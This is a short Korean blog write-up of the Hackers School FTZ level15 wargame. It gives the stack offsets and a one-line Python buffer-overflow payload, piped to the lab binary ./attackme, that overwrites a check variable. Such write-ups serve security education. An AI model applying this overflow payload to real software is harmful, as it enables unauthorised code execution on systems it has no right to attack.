FTZ level15

2021. 3. 16. 01:07·Write-Up/해커스쿨 FTZ
반응형

 

check값을 0xdeadbeef로 덮어주면 될것같다

buf = ebp-56

check = ebp-16

 

buf check 거리 = 40

(python -c 'print "A"*40 + "\xb2\x84\x04\x08"';cat)|./attackme

 

 

반응형

'Write-Up > 해커스쿨 FTZ' 카테고리의 다른 글

FTZ level17  (0) 2021.03.16
FTZ level16  (0) 2021.03.16
FTZ level14  (0) 2021.03.13
FTZ level13  (0) 2021.03.13
FTZ level12  (0) 2021.03.13
'Write-Up/해커스쿨 FTZ' 카테고리의 다른 글
  • FTZ level17
  • FTZ level16
  • FTZ level14
  • FTZ level13
Penguin Dev
Penguin Dev
What does the Penguin say?
    글쓰기 관리
  • Penguin Dev
    Pengha!
    Penguin Dev
  • 전체
    오늘
    어제
    • 분류 전체보기 (150)
      • Java & Spring (2)
      • System Hacking (4)
      • Algorithm (8)
        • Sorting algorithm (3)
      • Python (6)
      • DB (1)
      • Web (2)
        • Web Hacking & Security (2)
      • Write-Up (108)
        • pwnable.kr (17)
        • HackCTF (16)
        • 해커스쿨 FTZ (21)
        • LOB(lord of bufferoverflow) (19)
        • LOS (lord of sql injection) (28)
        • XSS-game (6)
        • Webhacking.kr (1)
      • SUA (19)
        • 오픈소스 보안 (19)
  • 블로그 메뉴

    • 홈
    • 태그
    • 방명록
  • 링크

  • 공지사항

  • 인기 글

  • 태그

    putval()
    AtomicLong
    DB정리
    sqlinjection
    ConcurrentHashMap
    Bubble Sort
    thread-safe
    spring boot
    Lock
    nop sled
    Java
    동시성
    selection sort
    hashmap vs concurrenthashmap
    시스템해킹
    lord of bufferoverflow
    코드트리
    spring
    코딩테스트
    concurrenthashmap vs hashmap
    LOB
    동시성처리
    Hashtable
    HashMap
    CountDownLatch
    enumerate #list comprehension
    tabat
    코드트리조별과제
  • 최근 댓글

  • 반응형
  • hELLO· Designed By정상우.v4.10.3
Penguin Dev
FTZ level15
상단으로

티스토리툴바